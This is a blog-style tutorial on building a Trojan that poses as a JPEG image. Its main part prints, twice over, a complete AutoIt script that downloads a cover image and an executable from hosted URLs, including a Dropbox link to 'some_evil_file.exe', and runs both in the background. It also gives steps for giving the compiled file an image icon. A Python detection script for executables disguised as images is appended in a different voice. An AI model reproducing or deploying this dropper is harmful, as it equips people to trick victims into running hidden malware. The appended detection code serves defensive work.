How I created a Trojan Malware — Ethical Hacking
A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect your computer or mobile device.
What is trojan malware?
When opened, Trojan malware appears to be a legitimate file, such as an image, a document or a media file, but in the background it runs a malicious process: for example, it may give someone access to your computer through a backdoor or inject other harmful code.
Creating my trojan malware
In this blog, I will show you how I combined my executable file with an image file, and when opened, it was able to display the image when a target person opened it, but at the same time, the executable ran in the background. In simple words, I hid my .exe file in a .jpg image file.
This method can be extended to any file type like image, pdf, music, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let’s look at the steps:
1. Get a direct URL for the image and the .exe file
The .exe executable file needs to be present on a publicly available URL from where it is directly downloaded by the browser. I have uploaded the executable on Dropbox for this purpose. In the case of Dropbox, modifying the end part of the sharable link to dl=1 will allow the browser to directly download the file. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.
URL for the .exe executable: https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1
URL for my image: https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg
Image of a sports complex
I have used the image of the sports complex as a cover.
2. Using the URLs in a script
#include <StaticConstants.au3> #include <WindowsConstants.au3>
Local $urls = "url1,url2"
Local $urlsArray = StringSplit($urls, ",", 2 )
For $url In $urlsArray $sFile = _DownloadFile($url) shellExecute($sFile)
Func _DownloadFile($sURL) Local $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17, 1) InetClose($hDownload) Return $sDirectory EndFunc ;==>_GetURLImage
In the above code, in line number 3, replace url1 with the URL of the image and url2 with the URL of the executable file. My final code looks like this
#include <StaticConstants.au3> #include <WindowsConstants.au3> Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1" Local $urlsArray = StringSplit($urls, ",", 2 ) For $url In $urlsArray $sFile = _DownloadFile($url) shellExecute($sFile) Next Func _DownloadFile($sURL) Local $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17, 1) InetClose($hDownload) Return $sDirectory EndFunc ;==>_GetURLImage
Save the file with the extension .au3. I have named the file trojan.au3.
3. Creating an icon for the file
Since I am using an image as a cover file, Windows usually shows the thumbnail of the image as a file icon, so I will use the sports complex image as an icon and convert it to .ico format. You can google for it and you will find a number of tools to do it. I used this website for it – https://cloudconvert.com/jpg-to-ico
4. Compiling the script
The script is written in a scripting language called AutoIt. To install AutoIt on Ubuntu, you can install wine and install AutoIt, or if you want a straightforward way, install Veil from the steps mentioned here https://www.javatpoint.com/installing-veil. AutoIt will be installed in one of the steps after which you can exit the installation.
Open the Compile AutoIt app. The window should look something like the box shown below. Enter the location of the trojan.au3 file and the path of the .ico file.
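A defender's view of the disguise described in this post, as an added example that is not the author's code: the check below classifies a file by its bytes rather than by its name or icon. The function names, finding labels and sample bytes are constructed for illustration; `AU3!EA06` and `AU3!EA05` are the markers that compiled AutoIt scripts carry.

```python
"""Triage a file by its bytes instead of its name or icon (added example)."""
from pathlib import PureWindowsPath

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".ico"}
# Markers embedded in compiled AutoIt scripts. Legitimate AutoIt tools carry
# them too, so this is a triage signal, not a verdict.
AUTOIT_MARKERS = (b"AU3!EA06", b"AU3!EA05")


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = int.from_bytes(data[0x3C:0x40], "little")
    return data[pe_off:pe_off + 4] == b"PE\0\0"


def triage(filename: str, data: bytes) -> list:
    """Return findings for a Windows executable presented as a picture."""
    findings = []
    if not is_pe(data):
        return findings
    suffixes = [s.lower() for s in PureWindowsPath(filename).suffixes]
    if suffixes and suffixes[-1] in IMAGE_EXTS:
        findings.append("pe-with-image-extension")
    if len(suffixes) >= 2 and suffixes[-2] in IMAGE_EXTS:
        findings.append("double-extension")
    if any(marker in data for marker in AUTOIT_MARKERS):
        findings.append("compiled-autoit-script")
    return findings


def fake_pe(body: bytes = b"") -> bytes:
    """Constructed sample: smallest header that satisfies is_pe(), plus body."""
    return b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + body


# Constructed sample inputs (names and bytes are made up for this example).
SAMPLES = {
    "park.jpg": b"\xff\xd8\xff\xe0" + b"\0" * 64,        # real JPEG magic
    "holiday.jpg.exe": fake_pe(),                         # extension hidden by Explorer
    "picture_viewer.exe": fake_pe(b"....AU3!EA06...."),   # image icon, AutoIt payload
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:20} {triage(name, blob) or 'clean'}")
```

Windows Explorer hides extensions for known file types by default, which is why a picture icon alone says nothing about what a file is; mail gateways and download scanners can apply the same content-based check before a file reaches a user.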